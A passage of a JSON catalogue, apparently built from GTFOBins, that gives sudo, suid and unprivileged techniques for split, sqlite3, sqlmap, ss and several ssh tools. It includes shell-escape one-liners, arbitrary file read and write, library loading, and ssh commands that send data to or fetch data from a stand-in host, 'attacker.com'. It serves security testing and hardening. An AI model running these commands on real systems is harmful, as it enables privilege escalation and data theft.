`999`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-read:0:suid","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-read:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-write:0:sudo","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-write:0:suid","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-write:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:shell:0:sudo","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:shell:0:suid","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:shell:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-read:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-read:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-read:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-write:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-write:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:file-write:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:shell:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:shell:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlite3:shell:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlmap:inherit:0:sudo","toolId":"gtfo:sqlmap","toolName":"sqlmap","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"sqlmap -u 127.0.0.1 --eval='...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sqlmap:inherit:0:unprivileged","toolId":"gtfo:sqlmap","toolName":"sqlmap","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"sqlmap -u 127.0.0.1 --eval='...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ss:file-read:0:sudo","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ss/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ss:file-read:0:suid","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ss/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ss:file-read:0:unprivileged","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ss/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:download:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:download:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:download:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:file-read:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:file-read:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:file-read:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:1:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:1:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:2:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh localhost","description":"Spawn the shell on the client, but still requires a successful remote connection.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:shell:2:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh localhost","description":"Spawn the shell on the client, but still requires a successful remote connection.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:upload:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:upload:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh:upload:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-agent:shell:0:sudo","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-agent:shell:0:suid","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-agent:shell:0:unprivileged","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-copy-id:file-read:0:sudo","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-copy-id -f -i /path/to/input-file.pub user@attacker.com","description":"The input file must have the `.pub` file extension. The file will be copied to `~/.ssh/authorized_keys`, otherwise the `-t /path/to/output-file` option can be used.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-copy-id:file-read:0:unprivileged","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ssh-copy-id -f -i /path/to/input-file.pub user@attacker.com","description":"The input file must have the `.pub` file extension. The file will be copied to `~/.ssh/authorized_keys`, otherwise the `-t /path/to/output-file` option can be used.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-copy-id:file-write:0:sudo","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ssh-copy-id -f -i /path/to/input-file.pub -t /path/to/output-file user@host","description":"The input file must have the `.pub` file extension.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-copy-id:file-write:0:unprivileged","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ssh-copy-id -f -i /path/to/input-file.pub -t /path/to/output-file user@host","description":"The input file must have the `.pub` file extension.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keygen:library-load:0:sudo","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` function.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keygen:library-load:0:suid","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` function.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keygen:library-load:0:unprivileged","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` function.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keyscan:file-read:0:sudo","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keyscan:file-read:0:suid","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keyscan:file-read:0:unprivileged","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File 